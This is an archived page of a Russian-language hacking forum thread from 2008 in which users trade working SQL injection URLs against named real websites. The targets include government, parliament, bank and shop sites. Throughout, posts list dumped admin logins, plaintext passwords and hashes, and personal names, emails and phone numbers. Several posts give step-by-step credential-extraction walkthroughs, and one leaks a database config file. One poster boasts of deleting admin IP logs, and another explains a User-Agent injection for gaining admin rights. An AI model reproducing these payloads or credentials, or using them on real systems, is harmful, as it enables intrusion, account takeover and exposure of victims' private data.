SQL Инъекции [Архив] - Страница 27

SeNaP

28.08.2008, 19:00

ЛОГИН:Anton
Пароль:majestic

http://www.devchatnik.ru

СКУЛЬ (http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,concat_ws(0x3a,users_login,u sers_password),5,6,7+from+xz_users/*)

P.S я удалил админские логи которые записывали IP

Cennarios

28.08.2008, 19:31

Я е..л и плакал...

http://vli-info.ru/index.php?p=show_cont&parent_id=-1+union+select+1,2,3,concat(login,0x3a3a,password, 0x3a3a,admin),5,6,7+from+users+limit+0,1

login: admin pass:1q2w3e4r

http://vli-info.ru/index.php?p=login

Тематика сайта и факт взлома заставили меня немного прслезиться...

Rubaka

28.08.2008, 22:53

http://www.bohnespring.ca/page.php?ID=4+union+select+1,2,user(),version(),5+ +limit+1,1/*

bohnesprin531436@216.251.35.195
4.0.27-standard-log

lastsmile

28.08.2008, 23:27

http://www.michaelpollan.com/article.php?id=-1+union+select+1,version(),database(),4,5,6,user() ,8,9,0+from+articles/*

4.1.22-standard
pollan_articles
pollan_article@localhost

$n@ke

29.08.2008, 00:27

http://www.st-johns-school.org.uk/pf-index.php?inc=-103+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19/*&id=564
Dbname: stjohns
Version: 4.1.20
User: stjoh1@bert.netweaver.net

SVAROG

29.08.2008, 03:06

http://www.iped.com/cm.php?id=-38'+union+select+1,concat_ws(0x3a,username,passwor d),3,4,5+from+iped.user+limit+1,1/*

Cennarios

29.08.2008, 03:08

http://wmbuy.info/index.php?gid=-1+union+select+concat(0x3a3a,login,0x3a3a,password )+from+users+limit+1,1

login:admin pass:ffffff

Fugitif

29.08.2008, 03:17

http://fashion1001nights.net/productdetail.php?catId=1+UNION+SELECT+concat_ws(0 x3a,version(),database(),user()),2,3/*

4.0.27-max-log:db232305948:dbo232305948@74.208.16.145

http://www.compel.com.tr/Include/Modules/ProductDetail.php?CatID=-1+UNION+SELECT+concat_ws(0x3a,version(),database() ,user()),2/*

4.1.22-standard:compelc_compel:compelc_iskender@localhost

errsec

29.08.2008, 11:24

На счёт темы про Грузию. Сайт парламента Грузии

ПРОСТЕЙШАЯ дырка, ппц

http://www.parliament.ge/index.php?lang_id=ENG&sec_id=1185&info_id=-20026+UNION+SELECT+1,2,3,4,5,6,7,password,9,10,11, 12,13+FROM+users--

user: dato@localhost
version: 5.0.51a-log

db: parliament
db: users

55e9a83d8533e24df2a3d444aedb48e8

login: vivageodea
pass: eannia

http://www.parliament.ge/admin/
доступ по IP , .htaccess

кто пройдёт дальше, отпишите плз

Cennarios

29.08.2008, 13:54

http://imperialove.ru/main/index.html?id=102&parent_id=-1+union+select+1,2,3,4,5,concat(0x3a3a3a3a3a3a3a3a 3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a,user_login,0x3a3a ,user_password),7,8+from+sys_users+limit+1,1

http://imperialove.ru/admin

login:admin pass:Ximper2ia

Зы:2 geforse С вопросами в тему 'Ваши вопросы по узвимостям'!!!!

paulzey

29.08.2008, 16:39

http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),version(),%20database()),10/*
olympicwatch_org_db@localhost:4.0.22:olympicwatch_ org_db

+ раскрытие пути Warning: getimagesize(): Unable to access ./img/img_php/1_obrazek1.8 in /domains3/olympicwatch-org/ftp/www_root/news.php on line 67

+ есть таблица users
http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,id,5,6,7,8,user,10+from+user s/*
1
olympicwatch-admin

Точно названия поля с хэшем подобрать не получилось, пришлось выдирать через хитрую задницу
http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1,2,3,4,5,6,7+from+users/*
затем, хитрый join три раза, поскольку поля лежали в не выводимых областях
http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1+from+users+join+users+u+join+u sers+b/*

Хэш:f0b16007c9541482261c66376e8eaf03
Подобрать не удалось, точный алгоритм не установлен. С учётом того, что в users три поля, соли там (скорее всего) нет.
Ничего особо интересного найти не удалось. :(

Fugitif

29.08.2008, 18:10

http://www.termal.gov.tr/portal/modules/articles/article.php?id=1%20UNION%20SELECT%201,2,3,4,concat _ws(0x3a,version(),database(),user()),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20/*

4.0.15:termalgovtr:termal-govtr@web1.turkticaret.net

-=megahertz=-

29.08.2008, 18:53

Вот несколько вкусных скулей от меня ;)

http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13/*
iletisim (Id)
kullanici_log
kullanicilar(ID, kullanici, sifre)
kurul_uyeler
kurullar
sayfa_icerik (KatID)
sayfalar (ID, sayfa_id, kullanici_id, sira, sayfa_adi, sayfa_adres, ust_id)
smf_members(ID_MEMBER, memberName, lngfile, passwd, ICQ, AIM, YIM, MSN )
smf_moderators
urun

http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,column_name,6,7,8,9,10,11 ,12,13+from+information_schema.columns+where+table _name=0x696C65746973696D+limit+7,1/*
http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,concat(ID,0x3a,kullanici, 0x3a,sifre),6,7,8,9,10,11,12,13+from+kullanicilar+ limit+0,1/*
http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,concat(ID_MEMBER,0x3a,mem berName,0x3a,passwd,0x3a,ICQ),6,7,8,9,10,11,12,13+ from+smf_members+limit+0,1/*

http://www.newportky.gov/inner_main.php?secid=-149+UNION+SELECT+concat(username,0x3a,password),2+ from+users+limit+0,1/*

http://parl.gov.mn/who/whoswho.php?st=5&memid=-35059+UNION+SELECT+1,concat(username,0x3a,password ),3+from+login/*,password),2+from+users/*
http://parl.gov.mn/who/whoswho.php?st=5&memid=-35059+UNION+SELECT+1,2,3+from+mysql.user/*

http://www.president.mn/show_module.php?index=speech&speechid=-214+UNION+SELECT+1,concat(userid,0x3a,username,0x3 a,loginname,0x3a,password),3,4,5,6,7,8,9,10,11,12, 13,14+from+user+limit+0,1/*

http://banten.go.id/?link=dtl&id=-2076+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22--

http://www.lincoln.gov.ar/index.php?seccion_generica_id=-36+UNION+SELECT+1,column_name,3+from+information_s chema.columns++where+table_name=0x5553554152494F53 +limit+23,1/*
USUARIOS (USUARIO_ID, CLAVE, APELLIDO_NOMBRE, CIUDAD, ACCESO_ADMIN, PAIS...)

http://www.ondostate.gov.ng/news_details.php?id=-1741+UNION+SELECT+1,concat(id,0x3a,username,0x3a,p assword),3+from+admin+limit+0,1/*

warlok

29.08.2008, 20:52

http://www.zaistinu.ru/articles/?sid=-29+union+select+version()
version() - 5.0.32-Debian_7etch6-log
user() - zaistinu_0001@77.221.130.22
database() - zaistinu_0001

http://alterego.tut.by/library/showarticle.php?id=55+union+select+1,user(),versio n(),database(),5,6
version() - 4.0.27-log
user() - alteregotutby@gemini.tutby.com
database() - alteregotutby

Shadow_p1raT

30.08.2008, 07:17

Cайт: clas.ru

http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_Ws(0x3a,database(), version(),user()),5,6,7,8--
User:u8122(sobaka)10.10.223.235
Version:5.0.45-log
Database:u8122_1gb_clas
Таблички:

bag
buyers
c_fields
c_order_fields
c_order_items
c_orders
colors
comments
companies
counter
countries
deliveries
delivery_fields
delivery_paids
distributors
fasons
genres
groups
ids
kath
links
media
messages
movies
news
news_items
opinions
orderpositions
orders
paids
people
pic
pic_any
presence
recences
screensizes
shirtmodels
shirts
shirtsgroup
sizes
staff
staff_types
subscribers
t_dostavka
t_news
t_oplata
t_rasskaz
t_users
texts
translations
users
vote_details
vote_items
vote_list
votes
wanted
book_wanted

Дальше не смог докопать,пошёл спать:(

USAkid

30.08.2008, 08:16

Дальше не смог докопать,пошёл спать:(

Мм... поможем :)

Просматриваем таблицу t_users лимитом
http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,column_name,5,6,7,8+from+i nformation_schema.columns+where+table_name=0x745f7 573657273+limit+0,1--

Видим интересные поля: id, pass... Также адреса, телефоны, IP-адреса и т.д. Кароч хорошая БД.

http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws(id,0x3a,pass),5, 6,7,8+from+t_users--

Эмм, логина не нашел. Идем в buyers.
http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws(login,0x3a,pass) ,5,6,7,8+from+buyers+limit+1,1--

И вот и пошли логины с пассами :)

Gorev

30.08.2008, 23:14

http://www.terranita.ro/int/index.php?req=catalog&src=-10'+UNION+SELECT+1,2,table_name+from+information_s chema.tables+limit+1,1/*&zid=1

Database Version: 5.0.26
Database name: terranita_facelift
User name: terranita_user@localhost

http://www.bogdanlobont.ro/ro/news/view?newsId=268+UNION+SELECT+1,2,3,4,5,6,7,8,conca t_ws(0x3a,version(),user(),database()),10/*

Database Version: 5.0.26
Database name: lobont1
User name: lobont@localhost

<Trash_man>

30.08.2008, 23:36

китайский шоп
http://www.chinatown.com.au/shope/viewdetail.asp?id=1'%20or%201=(SELECT+@@version)--
админки шопа не нашол нашол только эту
http://www.chinatown.com.au/henry/admin/
henry:chinatown

кому интересно ковыряйте дальше

Byrger

31.08.2008, 10:15

А смотрите...
вот таблица cpg_users с колонкой user_password
http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat_ws(0x3a3a,table_name,column_ name)+from+information_schema.columns+limit+296,1--
и user_name
http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat_ws(0x3a3a,table_name,column_ name)+from+information_schema.columns+limit+295,1--

почему не получается сделать запрос к этим колонкам?
Я пробовал
http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat_ws(0x3a3a,user_name,user_pas sword)+from+cpg_users--

N1K70

31.08.2008, 10:35

http://www.lolinko.com/index.php?command=claim&word=-666+union+select+concat_ws(user(),version(),databa se())+config_variables-- вот так вот =\

Byrger

31.08.2008, 10:38

вот так вот =\
http://www.lolinko.com/index.php?command=claim&word=-1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x78 73716C696E6A626567696E,Version(),0x2F2A2A2F,Databa se(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x7 1),0x71)--
Database Version: 5.0.37-log
Database name: words
User name: mylolinko@localhost

вот таблицы
Database [direcc]
Table [LINKER_CAT ( Rows)]
Table [LINKER_COM ( Rows)]
Table [LINKER_LINK ( Rows)]
Table [LINKER_MAIL ( Rows)]
Table [LINKER_TWORD ( Rows)]
Table [LINKER_WAIT ( Rows)]
Database [linkw]
Table [wl_admin ( Rows)]
Table [wl_content ( Rows)]
Table [wl_group ( Rows)]
Table [wl_settings ( Rows)]
Table [wl_transaction ( Rows)]
Table [wl_word ( Rows)]
Database [words]
Table [config_variables ( Rows)]
Table [font_size_list ( Rows)]
Table [site ( Rows)]
Table [site_status ( Rows)]
Table [word_color ( Rows)]
Table [words ( Rows)]

USAkid

31.08.2008, 11:53

http://www.emobila.com.ro

http://www.emobila.com.ro/detalii_categorii.php?id=-10+union+select+1,2,3,concat_ws(version(),0x3a,use r(),0x3a,database()),5,6,7,8,9,10/*

version() - 4.1.20-log
user() - emobilaro@193.226.140.172
database() - netemobilaro

remb0

31.08.2008, 12:03

http://www.bogdanlobont.ro/ro/news/view?newsId=268+UNION+SELECT+1,2,3,4,5,6,7,8,conca t_ws(0x3a,version(),user(),database()),10/*

Database Version: 5.0.26
Database name: lobont1
User name: lobont@localhost

http://www.bogdanlobont.ro/ro/news/view?newsId=268+UNION+SELECT+1,2,3,4,5,6,7,8,conca t_ws(id,0x3a,user_login,0x3a,user_pass),10+from+wp _users/*

:1admin1:1$P$Bs8ERbDq2W5FOIL14yZrI4rX1AEbuT0'

USAkid

31.08.2008, 12:15

http://www.probeg.ru

http://www.probeg.ru/news.php?action=read&id=-75+union+select+1,2,3,4,version(),6,7,8/*

version() - 4.1.22-standard-log
user() - probegru@localhost
database() - probegru_probeg

Чет одни 4-е версии пошли(...

USAkid

31.08.2008, 13:20

Ух ты. Shop National Archives of Australia

Поставим перед собой задачу: достать логин/пасс админа. Действуем:

https://shop.naa.gov.au

https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+version(),2,3/*

version() - 5.0.20-Debian_1-log
user() - naa_webuser@www1.ipalm.net.au
database() - naacart

Версия > 5 это хорошо.
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+table_name,2,3+from+information_sc hema.tables+limit+1,1/*

Находим интересную табличку admin. Изучаем ее:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+column_name,2,3+from+information_s chema.columns+where+table_name=0x61646d696e+limit+ 0,1/*
Что имеем?
id, email_address, password, SiteID, Creation, LastUpdate, common_name
Заинтересовали id и password. Смотрим:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+fr om+admin--
мм.. пока сохраним. Пойдем исследовать таблички дальше. Всего там 38 табличек.
Находим еще одну интересную - customer. Изучаем.
В ходе изучения выяснили, что таблица customer почти одинакова по строению с таблицей admin, только еще имеется личная инфа людей в этой БД и другое. Попробуем вытащить id и password из этой таблицы:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+fr om+customer+limit+0,1--
Давайте узнаем ID и password первого админа:
https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+fr om+admin+limit+0,1--
Получаем:
1 : 517c617e61a97d5d
Есть. ID и пароли мы получили. Что естественно было и нашей первоначальной задачей :)

Cennarios

31.08.2008, 16:55

http://test.uhyips.com/adsorder?id=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6+from+u60233_new.hyip_user+limit+0,1/*

login: Виктор
pass: 1234

Какая-то шняга

Cennarios

31.08.2008, 17:36

http://www.revistadelconsumidor.cl/articulos/contenidos.php?ID_Articulo=-1+union+select+1,2,3,4,5,6,7,8,concat(nom_usuario, 0x3a3a,password),10,11,12,13,14,15,16,17+from+tbus uarios/*

login: claudio
pass: tchpc

http://www.revistadelconsumidor.cl/admin/

Evil_Grey

01.09.2008, 00:21

Лодочки :D
http://www.kayakextrem.ru/olist.php?id_=1+union+select+1,2,user(),4,5,6,7/*

version() 4.0.26
user() kayakext@fox.hc.ru
database() wwwkayakextremru

Золотой шоп
http://dageena.com/subcategory.php?catid=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11/*
4.1.20-max-log:outsour_dageena:outsour_dageena@72.41.255.251

поисковик шопов или полушоп хз вобщем :confused:
http://www.lowyeah.com/store.php?store_id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase())

lowyeah@localhost:4.0.26:lowye</title>

Fugitif

01.09.2008, 01:35

http://www4.virgula.com.br/realitymusical/nota.php?id=1%20UNION%20SELECT%20concat_ws(0x3a,ve rsion(),database(),user()),2,3,4,5,6,7,8,9,10/*

5.0.32-Debian_7etch5-log:idolos:idolos@192.168.228.158

http://www.agenciapulsar.org/nota.php?id=1%20UNION%20SELECT%20concat_ws(0x3a,ve rsion(),database(),user()),2,3,4,5,6,7,8,9,10,11,1 2/*

4.0.18-standard-log:agenciapulsar:agenciapulsar@192.168.0.127

Shadow_p1raT

01.09.2008, 05:56

Вот сегодня шоп попался:)
Cайт:www.rocklandshop.spb.ru

http://www.rocklandshop.spb.ru/item.php?id=-43477+union+select+1,2,3,concat_ws(0x3a,version(), database(),user()),5,6,7,8,9,10,11/*
Version:5.0.32-Debian_7etch3-log
User:zorro_rockland@localhost
DataBase:zorro_rockland
Идём дальше,cмотрим что у нас в INFORMATION_SCHEMA.TABLES:

about
action
adidas_info
anketa
art
base
city
comment
contacts
exclusive_info
features
file_stat
glossary
goods
info
ip2country
links
menu
network
news
nike_info
orders
partners
poisk
presentation
presentation_copy
reebok_info
salomon_info
search
sites
subscribe
user
user_dopcat
vacancy
video
wallpaper
work

Заинтересовала табличка user:
Cмотрим поля через лимит:

http://www.rocklandshop.spb.ru/item.php?id=-43477+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10, 11+FROM+INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE _NAME=0x75736572+limit+0,1/*

Находим заинтересовавшие нас поля:

user
psw
email

И наконец выводим их:

http://www.rocklandshop.spb.ru/item.php?id=-43477+union+select+1,2,3,concat_ws(0x3a,user,psw,e mail),5,6,7,8,9,10,11+FROM+user/*

xWhitex

01.09.2008, 06:30

Перебераем до таблицы
http://www.guyetteandschmidt.com/warehouse/shopdisplayproducts.asp?cat=1'%20union%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45%20from%20tbluser"having%201=%201--sp_passsword
Теперь смотри пишет в 4 таблице логин в 22 пароль.
http://www.guyetteandschmidt.com/warehouse/shopdisplayproducts.asp?cat=1'%20union%20select%20 1,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20fro m%20tbluser"having%201=%201--sp_password

Fugitif

01.09.2008, 23:52

http://www.cz-usa.com/product_detail.php?id=1%20UNION%20SELECT%201,conca t_ws(0x3a,version(),database(),user()),3,4,5,6%20L IMIT%201,1/*
4.0.21-standard:czusa:czusa@lsh

http://www.bluestars.org/story.php?story_id=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6/*
4.1.22:web:web@localhost

http://www.fruehstyxradio.de/shop.php?artikel=1%20UNION%20SELECT%201,concat_ws( 0x3a,version(),database(),user()),3,4,5,6,7,8,9,10 %20LIMIT%201,1/*
4.0.24_Debian-10sarge2-log:usr_web1_1:web1@localhost

AND1

02.09.2008, 01:46

Все нашел сам! Не повторяються!

http://www.freepoc.de/viewapp.php?id=-12+union+select+1,2,3,4,5,6,7,version()/*

---------------------------------------------------------------------------------------------

http://www.generalsemantics.org/inner.php?page=news&id=-9+union+select+1,2,3,concat_ws(0x3a,UserName,Login Name,PassWord,email,phoneNo)+from+tbl_adminusers--

Lance Strate:lstrate:heroes:lstrate@time-binding.org:201-921-4745
Marty Levinson:Marty:Fairytales:igs@timebinding.org:718-793-6621
nmtucson:nmtucson:justme:millerstwo@comcast.net:52 0-225-0476
Jennifer Clarke:jennifer:56375637:igs@time-binding.org:817-922-9950

Админка http://www.generalsemantics.org/admin/login.php

--------------------------------------------------------------------

http://www.korova.ru/humor/viewer.php?id=-32+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18--

4.0.27-max-log

---------------------------------------------------------------------

http://www.arcadepod.com/games/details.php?id=-3937+union+select+1,2,3,4,5,version(),7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

4.1.20

PR=5

---------------------------------------------------------------------

http://www.teatrdoc.ru/plays.php?id=-5+union+select+1,2,version(,4,5--
4.1.22

http://www.sumw.com/index.php?page=products&pid=-1+UNION+SELECT+1,2,3,4,5,version(),7,8--

http://zvezda.ru/file.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,version(,11--

http://www.teatrdoc.ru/plays.php?id=-5+union+select+1,2,version(),4,5--

------------------------------

http://www.dubkow-muehle.de/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user() ,0x3a,database())--
version() - 5.0.45
------------------------------

http://www.asud.net/Iniziative/iniziativa.php?in=1+UNION+SELECT+1,concat_ws(0x3a, version(),database(),user()),3,4,5,6,7,8--
4.1.22-standard-log

------------------------------

http://www.cenn.org/index.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,version(),17,18,19,20,21,22,23--

4.1.14

---------------------

http://www.lcoastpress.com/book.php?id=-99+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20--

4.1.22
lcpadmin : plQAxyWbMGJyQ Таблица user

---------------------

http://www.icehw.net/article.php?id=-99+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13,14,15,16--

5.0.22-Debian_0ubuntu6.06.3-log

table: login
Concat_ws(0x3a,ID,username,PASSWORD)

---------------------

http://www.ecuadorminingnews.com/news.php?id=-99+union+select+1,2--

--------------------------------------

http://www.rezina.biz/show.php?id=-27+union+select+1,2,version(),4,5,6,7--

4.0.27-max-log

---------------------------------------

http://www.eatmybrains.com/showfeature.php?id=-27+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15,16--

5.0.51a-community

Таблица user но в ней нет колнки с пасами!

----------------------------------------

http://www.satire.ru/actor_detail.php?id=-31+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13--

4.1.22

-----------------

http://www.zaistinu.ru/articles/?sid=-29+union+select+version()--

5.0.32-Debian_7etch6-log

-----------------

http://www.iped.com/cm.php?id=-38'+union+select+1,concat_ws(0x3a,username,passwor d),3,4,5+from+iped.user+limit+1,1--

-----------------

MTV

http://www.mtvphil.com/news.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11--

4.1.22-standard

-----------------

http://www.whitestrip.ru/article.php?id=-49+union+select+1,2,3,4,5,table_name,7,8,9,10,11,1 2,13,14,15+from+information_schema.tables+limit+1, 1--

-----------------

http://okwildlife.org/news.php?id=-48+union+select+1,2,3,version(),5,6--

4.1.21-community-nt

-----------------

http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+u sers+limit+2,1--

login:brianficek
pass:85688717ef4fab9

-----------------

http://vli-info.ru/index.php?p=show_cont&parent_id=-1+union+select+1,2,3,concat(login,0x3a3a,password, 0x3a3a,admin),5,6,7+from+users+limit+0,1--

admin::5416d7cd6ef195a0f7622a9c56b55e84

-----------------

http://www.info.gomel.by/news.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),DATABASE()),6,7,8,9,10,11,12--

4.0.18:artbase

-----------------

http://www.kidtokid.com/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9--

-----------------

http://www.idcfl.com/news.php?id=-2+union+select+1,table_name,3+from+information_sch ema.tables+limit+1,1--

-----------------

http://www.videodep.com/news.php?id=-23+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4+from+users+limit+0,1--

http://www.videodep.com/news.php?id=-23+union+select+1,concat_ws(0x3a,username,password ,id),3,4+from+admin--

http://www.videodep.com/users/

http://www.videodep.com/admin/ drew:test

------------------

Выбирал себе котлы, и случайно увидел id=7 Вот что из этого получилось, но нет табл с пассами, так бы может нахаляву заказал бы)))

http://www.clockmarket.ru/catalog/index.php?brand_id=-7+union+select+1,table_name,3+from+information_sch ema.tables+limit+0,1--

-------------------

Twoster

02.09.2008, 09:48

Сайт какого то китайского ресторана (могу ошибаться! =))
http://www.orange-group.net/news.php?news_id=-1+union+select+user(),2,version()/*

И на сладенькое:

http://www.aversi.ge/news.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,user(),17,18,19,20,21,22,23/*

spherics

02.09.2008, 17:47

Первое сообщение первый взлом.
В общем пароли в неприкрытом виде да вообще все неприкрыто.

Сайт: http://northlove.ru
http://northlove.ru/stati.php?p=2&r=1'+UNION+SELECT+1,password,name,4, 5,6,id,8+ from+users/*

Mysql version 5.0.45
database love
user root@localhost

Буду рад за какие нить подсказки....*)

-=Static=-

03.09.2008, 02:42

Промсвязьбанк
target:
http://www.psbank.ru

SQL:
http://www.psbank.ru/news/bank/-9722'+union+select+1,2,3,4,5,6,'sql/*.html
http://www.psbank.ru/person/-46'+union+select+1,2,'/*/

раскрытие пути:
/home/www/webadmin/inc/pfunc.php

SELECT * FROM PSBNEWS WHERE "id" = '*'

SELECT "dir" , "title" as "title" , "id" , "pid" , "hiddenLink" , "cod" FROM CATALOGUE_FIN WHERE "dir" = 'news' or "dir" = 'bank' or "dir" = '-9722' + union + select + 1 , 2 , 3 , 4 , 5 + where + "id" != '1' ORDER BY "pid"

Это все что удалось наковырять. Если у кого что получится больше, отпишитесь плз

Twoster

03.09.2008, 10:49

Продолжаю Wap тематику!
(Цель заполучить админку)

Первый сервис wap-чатов
100 чатов==100 админов (;

wolk-club.ru (http://wolk-club.ru/wolkchat2/)

Второй чат (того же движка)
mmfki.ru (http://mmfki.ru/chat)

Третий чат (того же движка)
wap.srb.co.yu (http://wap.srb.co.yu)

Четвертый чат (того же движка)
neochat.co.za (http://neochat.co.za)

Пятый чат (того же движка)
chat.blaser.h2m.ru (http://chat.blaser.h2m.ru/)

Принцип инъекции - подмена юзер агента на antichat', admin='1

Для подмены я использую Ad Muncher (скачать можно Тут (http://softsearch.ru/programs/225-115-muncher-build-27105-final-download.shtml) )

Иногда приходится зайти в редактирование профиля, чтобы юзер агент обновился!

P.S. Тут (http://video.antichat.ru/file236.html) видео по взломам этого типа движков. (Писалось мной в прошлом году под утерянным ником)

P.P.S. Адрес админки admin.php?id=Ваш id&pass=Ваш pass
P.P.P.S По поводу того, что сплойт не сработал - пробуйте менять юзер агент при регистрации и при смене профиля! При регистрации на некоторых модификациях движка может выдавать ошибку или бан по IP+Browser! Так же в некоторых движках не фильтруется поле "О себе"

Twoster

04.09.2008, 12:16

Вот еще чуток скулей:
http://www.vaal.ru/show.php?id=-1+union+select+1,database(),3,4,5,6,7,8,user(),ver sion(),11/*

http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,user(),version(),database(),6,7 ,8,9,10,11,12,13/*
http://www.rezina.biz/show.php?id=-1+union+select+1,2,user(),4,database(),6,7/*
http://www.sufficiencyeconomy.org/show.php?Id=-134+union+select+1,2,3,4,5,user(),7,database(),9,1 0,11,12,13,14,15/*

P.S. не забываем убирать пробелы! (;

Calcutta

04.09.2008, 12:16

http://www.pmed.ru/conf/index.php?id=-2376111+union+select+1,2,3,4,5,6,7,8,9,10,11--
странного вида инъекция -)

Saint-Sky

04.09.2008, 12:21

Мой рекорд по количеству столбцов. Ппц, не думал, что такое встречается...
http://www.net-antiquites.com/index.php?page=produits&id_typeproduit=119&id=-273+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,user(),21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,version(),36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77, 78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94 ,95,96,97,98,99,100,101,102,103,104,105,106,107,10 8,109,110,111,112,113,114,115,116,117,118,119,120, 121,122,123,124,125,126,127--

netan_netan@localhost
5.0.51a-community-log

KaJIaLL1HuKoB

04.09.2008, 12:27

наверно не в тему...

низнаю полезно это или нет ну все же

http://www .gorenje.ru/

http://www .gorenje.ru/happynewyear/db.inc

<?php

/*
$sqlServer = 'localhost';
$sqlLogin = 'root';
$sqlPassword = 'a123dmin';
$sqlDatabase = 'jar_gorenje';
*/

$sqlServer = 'localhost';
$sqlDatabase = 'site';
$sqlLogin = 'site';
$sqlPassword = 'Vie4u';

$sqlHandle = mysql_connect ($sqlServer, $sqlLogin, $sqlPassword);

mysql_select_db ($sqlDatabase, $sqlHandle);

?>

зы его хостинг http://webhosting-say.hc. ru/

http://www.detki.ru/index.php?mode=gallery&id=-296+UNION+SELECT+1,2,name,4,5,6+from+srv14130_detk i.shops--

ничего толком и не нашол((

Twoster

04.09.2008, 14:49

Еще 3 штучки
http://ukmoths.org.uk/show.php?id=-1+union+select+1,2,user(),4,5,version(),7,8,9,10,1 1,12,13,14,database(),16/*
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,user(),database()/*
http://www.hnsassociates.net/web/spheniscidae/news.php?id=-1+union+select+1,database(),version(),4,user(),6,7/*

P.S. и опять же не забываем про пробелы!

o3,14um

05.09.2008, 01:04

гитаристам))
http://www.akkords.ru/news.php?nid=-1+union+select+1,2,table_name,4,5,6,7+from+informa tion_schema.tables/*
http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,name,member_logi n_key),4,5,6,7+from+forum_akkords.ibf_members/*
http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,login,pass),4,5, 6,7+from+admin/*
http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,nick,pass),4,5,6 ,7+from+users/*
сонник:
http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,database(),3,4,5/*

http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,table_name,3,4,5+from+information _schema.tables/*

http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,column_name,3,4,5+from+informatio n_schema.columns+where+table_name=CHAR(103,111,114 )/*

ILYAtirtir

05.09.2008, 01:31

to KaJIaLL1HuKoB
http://www.detki.ru/index.php?mode=gallery&id=-296+UNION+SELECT+1,2,concat_ws(0x3a,name,activity, addr,phone,email,site,number),4,5,6+from+shops--

http://new.gazanalyzator.ru/index.php?id=-70/**/union/**/select/**/concat_ws(0x3a,user(),version(),database()),2,3,4--
gazanaly_gazanal@localhost:4.1.22-standard:gazanaly_data

http://www.rifpark.ru/enc/index.php?id=999+union+select+1,2,3,4,5,6,concat_w s(0x3a,version(),user(),database()),8,9,10/*
